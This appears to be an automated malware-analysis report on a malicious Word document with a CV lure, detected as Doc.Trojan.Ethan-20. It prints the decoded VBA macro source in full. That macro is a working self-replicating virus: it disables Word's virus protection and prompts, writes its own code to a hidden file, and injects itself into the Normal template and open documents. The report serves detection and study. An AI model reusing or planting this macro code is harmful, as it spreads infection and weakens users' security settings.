MALICIOUS
80
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample is a malicious Office document containing VBA macros. The macros attempt to copy themselves to a file named 'c:\IDEDev.___\', suggesting an attempt to establish persistence or prepare for further execution. The document body is a curriculum vitae, likely a lure to encourage macro execution.
Heuristics 2
-
ClamAV: Doc.Trojan.Ethan-20 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Ethan-20
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6792 bytes |
SHA-256: 2b82a196b78c3a987974d465a7fff736eab7ce7d78dd082f524315c45b2a3466 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Rem ID Private Sub Document_Close() Rem >>>>>>>>>>Wordbackup Rem Makes backups of Word Documents Whever You Like It Or You don't Rem Initialise On Error Resume Next s = ActiveDocument.Saved Application.EnableCancelKey = Not -1 With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With Randomize Rem >>>>>>>>>>Breed The Code<<<<<<<<<<<<< Rem Copy Self To c:\IDEDev.___ Open "c:\IDEDev.___" For Output As #1 For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1) Print #1, a Next i Close #1 SetAttr "c:\IDEDev.___", 6 Rem Does master contain Macro? If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Rem ID" Then Set t = NormalTemplate.VBProject.VBComponents.Item(1) ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Rem ID" Then Set t = ActiveDocument.VBProject.VBComponents.Item(1) Else t = "" End If Rem If Not Then Copy The Contents Of c:\IDEDev.___ to it If t <> "" Then Open "c:\IDEDev.___" For Input As #1 If LOF(1) = 0 Then GoTo q i = 1 Do While Not EOF(1) Line Input #1, a t.CodeModule.InsertLines i, a i = i + 1 Loop q: Close #1 If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End If If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s Rem >>>>>>>>>>>>>Backup The Document<<<<<<<<<<<<<<<< temp = ActiveDocument.FullName savedir = "c:\winbackup" savefile = savedir + "\" + ActiveDocument.Name MkDir (savedir) SaveAs (savefile) SaveAs (temp) End Sub ' Processing file: /opt/analyzer/scan_staging/51cbaae99fcd429f84317119e4ae7d3c.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 8386 bytes ' Line #0: ' Line #1: ' Rem 0x0003 " ID" ' Line #2: ' FuncDefn (Private Sub Document_Close()) ' Line #3: ' Line #4: ' Rem 0x0015 " >>>>>>>>>>Wordbackup" ' Line #5: ' Rem 0x0040 " Makes backups of Word Documents Whever You Like It Or You don't" ' Line #6: ' Line #7: ' Rem 0x000B " Initialise" ' Line #8: ' OnError (Resume Next) ' Line #9: ' Ld ActiveDocument ' MemLd Saved ' St s ' Line #10: ' LitDI2 0x0001 ' UMi ' Not ' Ld Application ' MemSt EnableCancelKey ' Line #11: ' StartWithExpr ' Ld Options ' With ' BoS 0x0000 ' LitDI2 0x0000 ' MemStWith ConfirmConversions ' BoS 0x0000 ' LitDI2 0x0000 ' MemStWith VirusProtection ' BoS 0x0000 ' LitDI2 0x0000 ' MemStWith SaveNormalPrompt ' BoS 0x0000 ' EndWith ' Line #12: ' ArgsCall Read 0x0000 ' Line #13: ' Line #14: ' Rem 0x0026 " >>>>>>>>>>Breed The Code<<<<<<<<<<<<<" ' Line #15: ' Line #16: ' Rem 0x001B " Copy Self To c:\IDEDev.___" ' Line #17: ' LitStr 0x000D "c:\IDEDev.___" ' LitDI2 0x0001 ' Sharp ' LitDefault ' Open (For Output) ' Line #18: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld MacroContainer ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd CountOfLines ' For ' Line #19: ' Ld i ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld MacroContainer ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' St a ' Line #20: ' LitDI2 0x0001 ' Sharp ' PrintChan ' Ld a ' PrintItemNL ' Line #21: ' StartForVariable ' Ld i ' EndForVariable ' NextVar ' Line #22: ' LitDI2 0x0001 ' Sharp ' Close 0x0001 ' Line #23: ' LitStr 0x000D "c:\IDEDev.___" ' LitDI2 0x0006 ' ArgsCall SetAttr 0x0002 ' Line #24: ' Line #25: ' Rem 0x001B " Does master contain Macro?" ' Line #26: ' L ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.